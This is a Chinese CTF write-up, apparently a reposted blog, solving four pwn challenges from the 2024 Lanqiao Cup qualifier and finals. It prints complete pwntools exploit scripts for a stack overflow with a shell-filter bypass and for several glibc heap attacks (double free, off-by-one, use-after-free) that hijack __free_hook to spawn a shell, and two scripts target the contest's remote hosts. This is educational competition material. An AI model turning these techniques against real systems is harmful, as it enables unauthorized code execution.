2024蓝桥杯初赛决赛pwn题全解

news2024/11/17 4:46:43

蓝桥杯初赛决赛pwn题解

  • 初赛
    • 第一题
    • 第二题
  • 决赛
    • getting_started
    • babyheap

初赛

第一题

在这里插入图片描述
有system函数,并且能在bss上读入字符

而且存在栈溢出,只要过掉check函数即可
check函数中,主要是对system常规获取权限的参数,进行了过滤,用$0即可

exp:

from pwn import *
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()

context(os='linux', arch='amd64', log_level='debug')
p = remote('', )
rl("restricted stack.\n")
pay=b'$0'
s(pay)

rl("...\n")
pay=b'a'*0x28+p64(0x0000000000400933)+p64(0x601090)+p64(0x400778)
s(pay)

sleep(0.5)
sl(b'exec 1>&0')


inter()

第二题

经典堆菜单题目
在这里插入图片描述
发现没有edit功能,考虑double free。版本为2.31 09.9

挨个分析
add函数,申请堆块部分
在这里插入图片描述
只能申请0x50大小的堆块,并且能读入0x50字节的大小内容

free部分,
free之后有置零,所以不存在uaf漏洞

在这里插入图片描述
show就是个正常打印
在这里插入图片描述

漏洞是在这个函数
在这里插入图片描述

在这里插入图片描述

没有置零关键部分,所以存在uaf漏洞,因为只能申请0x50大小的堆块,所以考虑使用fastbin的double free

具体思路:
先把tcachebin填满
之后利用后门函数free一个进fastbin,然后正常再free两个堆块(第二次free的是后门free的那一个)
以此构造出double free,然后把tcache bin全部申请回来,然后再申请一个fastbin的堆块,fastbin的其他堆块就会进入到tcache bin里,因为前面已经构造了double free,所以这次可以修改fd的末位,然后就能申请出来这个错位的堆块A,修改堆块的size,然后free进unsorted bin,之后申请一个小块B,泄露libc,然后free这个小块B,再free小块A(A需要提前伪造好size位)然后申请回来A,把B的fd改为free hook,然后打free hook为system即可

from pwn import *
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

context(os='linux', arch='amd64', log_level='debug')
p = remote('',)
libc = ELF('./libc.so.6')

def add(c):
	rl("4.exit\n")
	sl(str(1))
	sleep(0.2)
	s(c)

def free(i):
	rl("4.exit\n")
	sl(str(2))
	sleep(0.2)
	sl(str(i))

def show(i):
	rl("4.exit\n")
	sl(str(3))
	sleep(0.2)
	sl(str(i))

def free2(i):
	rl("4.exit\n")
	sl(str(0x202405))
	sleep(0.5)
	sl(str(i))

add(b'\x00'*0x38+p64(0x61))
add(b'\x00'*0x28+p64(0x61))
for i in range(12):
	add(b'a') #为伪造size做准备
for i in range(7):
	free(i+2)
free(9)
free(10)
free2(0)
free(1)
free(0)
for i in range(7):
	add(b'a')
add(b'\x30')
add(b'a')
add(b'a')
add(b'\x00'*0x28+p64(0x421)) #修改size位
free(6)
add(b'a')
show(6)
libc_base=get_addr()-0x1ecf61
li(hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
li(hex(free_hook))
system,bin=get_sb()
free(11)
free(6)
free(10)
add(b'\x00'*0x28+p64(0x61)+p64(free_hook)) #修改fd位
add(b'/bin/sh\x00')
add(p64(system))
free(10)

inter()

哪里不明白,调试调试就行了

决赛

getting_started

比赛的时候,先看的这个题目,本地打通的了,远程打不通,这个随机值纯看脸,我脸黑,重开靶机10次左右,才打通,但是没血了

以时间为种子产生随机值
在这里插入图片描述

然后就是一个栈溢出
在这里插入图片描述

这个开启pie了,并且没法泄露东西,所以就正常输入随机值了
之后就是一个菜单题目
在这里插入图片描述
add函数,最大申请0x100的堆块
在这里插入图片描述

漏洞在edit里
在这里插入图片描述

在这里插入图片描述

这是先读入后判断,所以存在off by one,实际还有个null
思路就是利用off by one修改size,构造堆块重叠

利用思路
因为堆块限制的不强,所以直接free满tc,进入unsorted,之后再申请回来一部分,然后show出来libc
然后,off by one构造堆块重叠,利用重叠的堆块,修改fd,申请到free hook,然后打free hook为system

exp:

from pwn import *
from struct import pack
from ctypes import *
from LibcSearcher import *
import base64
import gmpy2
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_addr1():
    return u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn')
p = remote('39.106.48.123', 22289)
elf = ELF('./pwn')
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
#libc = ELF('./libc-2.31.so')

def add(idx,size):
	rl(":")
	sl(str(1))
	rl("Index: ")
	sl(str(idx))
	rl("Size ")
	sl(str(size))

def edit(idx,c):
	rl(":")
	sl(str(2))
	rl("Index: ")
	sl(str(idx))
	rl("Content: ")
	s(c)

def show(idx):
	rl(":")
	sl(str(3))
	rl("Index: ")
	sl(str(idx))

def free(idx):
	rl(":")
	sl(str(4))
	rl("Index: ")
	sl(str(idx))



libc = cdll.LoadLibrary('./libc-2.27.so')
seed =libc.time(0)
srand = libc.srand(seed)

a=[0,0,0,0,0,0,0,0,0,0]
for i in range(7):
	a[i]=int(str(libc.rand()% 80 + 32).encode())
rl("please login >>>>\n")
pay=p8(a[0])+p8(a[1])+p8(a[2])+p8(a[3])+p8(a[4])+p8(a[5])+p8(a[6])
sl(pay)


libc=ELF("./libc-2.27.so")

for i in range(10):
	add(i,0x90)
for i in range(7):
	free(i)

free(7)
show(7)
for i in range(7):
	add(i,0x90)
add(7,0x20)
show(7)
libc_base=get_addr()-0x3ebd30
li(hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
system,bin=get_sb()
for i in range(11):
	add(i+10,0x68)

edit(17,b'a'*0x68+p8(0xe1))
free(18)
free(19)
add(18,0xd8)
edit(18,b'a'*0x68+p64(0x71)+p64(free_hook)+b'\n')
add(27,0x68)
edit(27,b'/bin/sh\x00\n')
add(28,0x68)
edit(28,p64(system)+b'\n')
free(27)


inter()

babyheap

同样也是4个功能
在这里插入图片描述

申请给限制到0-0x60
在这里插入图片描述

有个后门可以申请一个大堆块
在这里插入图片描述
free函数中存在uaf漏洞
在这里插入图片描述

这个题目和初赛的第二题有点像,这个题目更好布置堆块
也是通过double free,修改fd的末位,不过这个要小布置一下堆块,因为这个edit会在末位填上null,申请出来错位的堆块A,修改一下size,free进unsorted,然后show出libc,取出来这个堆块(A包含的堆块),free进tc里,通过A修改它的fd为free hook,然后打free hook为system

exp:

from pwn import *
from struct import pack
from ctypes import *
from LibcSearcher import *
import base64
import gmpy2
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

context(os='linux', arch='amd64', log_level='debug')
p = remote('8.147.132.99',23464)
elf = ELF('./pwn')
libc=ELF("./libc.so.6")

def add(idx,size):
	rl(">> \n")
	sl(str(1))
	rl("index: \n")
	sl(str(idx))
	rl("size: ")
	sl(str(size))
	
def free(idx):
	rl(">> \n")
	sl(str(2))
	rl("index: \n")
	sl(str(idx))

def edit(idx,c):
	rl(">> \n")
	sl(str(3))
	rl("index: \n")
	sl(str(idx))
	rl("contents: \n")
	s(c)

def show(idx):
	rl(">> \n")
	sl(str(4))
	rl("index: \n")
	sl(str(idx))
def add2(size):
	rl(">> \n")
	sl(str(555))
	rl("find me\n")
	sl(str(size))


add(0,0x60)
add(1,0x60)
add2(0x400)
add(2,0x60)

free(1)
free(0)
edit(0,b'\n')
add(3,0x60)
add(4,0x60)
edit(4,p64(0)+p64(0x481)+b'\n')
free(1)
show(1)
libc_base=get_addr()-96-0x10-libc.sym['__malloc_hook']
li(hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
system,bin=get_sb()


add(5,0x60)
free(2)
free(5)
edit(4,p64(0)+p64(0x71)+p64(free_hook)+b'\n')
add(6,0x60)
edit(6,b'/bin/sh\x00\n')
add(7,0x60)
edit(7,p64(system)+b'\n')
free(6)

	
inter()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1788557.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

linux部署运维3——centos7下导入导出mysql数据库的sql文件以及查询数据量最大的表信息

在实际项目开发或者项目运维过程中,数据库的导入导出操作比较频繁,如果可以借助第三方工具那当然算喜事一桩;但是如果不允许外部访问,那么就只能使用数据库自带的命令,也是相当方便的。 一.导入sql文件 1.在linux命令…

Asp.Net Core 实现分片下载的最简单方式

技术群里的朋友遇到了这个问题,起初的原因是他对文件增加了一个属性配置 fileResult.EnableRangeProcessing true;这个属性我从未遇到过,然后,去F1查看这个属性的描述信息也依然少的可怜,只有简单的描述为(获取或设置为 启用范围…

CCIG 2024:大模型技术及其前沿应用论坛深度解析

一、CCIG论坛介绍 中国图象图形大会(CCIG 2024)是一场备受瞩目的学术盛会,近期在陕西省西安市曲江国际会议中心举行。这次会议以“图聚智生,象合慧成”为主题,由中国图象图形学学会主办,旨在汇聚图像图形领…

一篇文章讲透数据结构之树and二叉树

一.树 1.1树的定义 树是一种非线性的数据结构,它是有n个有限结点组成的一个具有层次关系的集合。把它叫做树是因为它看起来像一棵倒挂的树,也就是说它是根在上,叶在下的。 在树中有一个特殊的结点,称为根结点,根结点…

从0开始制作微信小程序

目录 前言 正文 需要事先准备的 需要事先掌握的 什么是uniapp 平台应用的分类方式 什么是TypeScript 创建项目 项目文件作用 源码地址 尾声 🔭 Hi,I’m Pleasure1234🌱 I’m currently learning Vue.js,SpringBoot,Computer Security and so on.&#x1…

大数据之CDH对Hdfs做Balance数据均衡/数据平衡/数据倾斜

问题的来源: 由于在hive工具运行sql,出现sql卡顿的情况,去cdh上查看yarn资源的分布情况,发现了整个cdh平台中hdfs和yarn资源分布不均匀,大量的爆红显示: 以下 DataNode 数据目录 位于小于其可用空间 10.0 吉字节 的文件系统中。 /data1/dfs/dn(可用:7.2 …

(九)Spring教程——ApplicationContext中Bean的生命周期

1.前言 ApplicationContext中Bean的生命周期和BeanFactory中的生命周期类似,不同的是,如果Bean实现了org.springframework.context.ApplicationContextAware接口,则会增加一个调用该接口方法setApplicationContext()的步骤。 此外&#xff0c…

气膜建筑的施工对周边环境影响大吗?—轻空间

随着城市化进程的加快,建筑行业的快速发展也带来了环境问题。噪音、灰尘和建筑废料等对周边居民生活和生态环境造成了不小的影响。因此,选择一种环保高效的施工方式变得尤为重要。气膜建筑作为一种新兴的建筑形式,其施工过程对周边环境的影响…

python——网络编程

流程图 面向连接的套接字 面向连接的通信提供序列化的、可靠的和不重复的数据交付,而没有记录边界。主要的协议是传输控制协议(TCP); TCP套接字,在python中,必须使用SOCK_STREAM作为套接字类型 tcp的特点 面向连接…

工业机器视觉系统如何实现精准检测?

机器视觉系统是指利用机器替代人眼做出各种测量和判断。一种比较复杂的系统。大多数系统监控对象都是运动物体,系统与运动物体的匹配和协调动作尤为重要,所以给系统各部分的动作时间和处理速度带来了严格的要求。在某些应用领域,例如机器人、…

C++高级 - 接口模板

目录 一. 接口 二. 模板 一. 接口 接口通常是通过抽象类或纯虚函数来实现的。 以下是一个使用抽象类来定义接口的示例代码&#xff1a; #include <iostream>class Interface { public:virtual void operation() 0; // 纯虚函数定义接口 };class ConcreteClass : pu…

网络安全||信息加解密技术以及密钥管理技术

一、信息加解密技术 对称加密 对称加密&#xff08;又称为私人密钥加密/共享密钥加密&#xff09;&#xff1a;加密与解密使用同一密钥。特点&#xff1a;加密强度不高&#xff0c;但效率高&#xff1b;密钥分发困难。&#xff08;大量明文为了保证加密效率一般使用对称加密&…

Three.js的阴影技术,创建逼真效果的必备!

three.js是一个流行的用于创建和展示3D图形的JavaScript库&#xff0c;它提供了多种阴影技术来增强3D场景的真实感和视觉效果。 一、常用阴影技术 1. 基于光线的阴影&#xff08;Raytraced Shadows&#xff09;&#xff1a;通过跟踪光线的路径来计算阴影&#xff0c;产生非常…

SylixOS网卡多 IP 配置

概述 网卡多 IP 是指在同一个网络接口上配置和绑定多个 IP 地址。 引进网卡多 IP 的目的主要有以下几个&#xff1a; 提供服务高可用性。通过在同一接口绑定多个 IP 地址&#xff0c;然后在服务端使用这些 IP 地址启动多个服务实例。这样在任意一 IP 出现问题时&#xff0c;可…

el-input实现后缀图标和clearable的兼容,调整el-input clearable与自定义图标展示位置问题

背景&#xff1a;常见的输入框存在两个图标的展示效果都是清空在前搜索或其他图标在后 常见以及最终实现效果&#xff08;清空图标在前&#xff0c;搜索图标在后&#xff09; BUG以及el-input默认效果 问题排查 通过控制台审查元素能够发现&#xff0c;默认的效果是自定义图标…

何为云防护?有何作用

云防护又称云防御。随着Internet互联网络带宽的增加和多种DDOS 黑客工具的不断发布&#xff0c;云计算越演越热&#xff0c;DDOS拒绝服务攻击的实施越来越容易&#xff0c;DDOS攻击事件正在成上升趋势。出于商业竞争、打击报复和网络敲诈等多种因素&#xff0c;导致很多IDC 托管…

避免 PostgreSQL 翻车的关键技巧

PostgreSQL 是一个功能强大的开源关系型数据库管理系统&#xff0c;它以其稳定性和高性能而受到开发者和企业的青睐。然而&#xff0c;在实际操作中&#xff0c;不当的变更管理可能会导致数据库性能下降或系统崩溃。为了避免这种情况&#xff0c;我们提供了以下关键技巧来确保 …

Docker桥接网络分析

前言 《虚拟局域网(VLAN)》一文中描述了虚拟网卡、虚拟网桥的作用&#xff0c;以及通过iptables实现了vlan联网&#xff0c;其实学习到这里自然就会联想到目前主流的容器技术&#xff1a;Docker&#xff0c;因此接下来打算研究一下Docker的桥接网络与此有何异同。 猜测 众所周知…

react基础学习 JSX

JSX的测试网站 Babel Babel 可以测试代码的效果 JSX实现map列表 注意 key不一样&#xff08;使用遍历的时候&#xff09; 简单条件渲染 复杂条件渲染 绑定事件 function App() {const colorse (e)>{console.log("测试点击",e);}const colorse1 (name)>{…

月入30000的软件测试人员,简历是什么样子的?

我们都知道&#xff0c;简历是一个人进入职场的敲门砖。从某种层面来说&#xff0c;简历也像一个人的具象身份证&#xff0c;或者专业资格证。所以&#xff0c;一份简历的好坏&#xff0c;不仅关乎个人的“脸面”&#xff0c;更关乎你是不是一个有“含金量”的技术人员。 所以…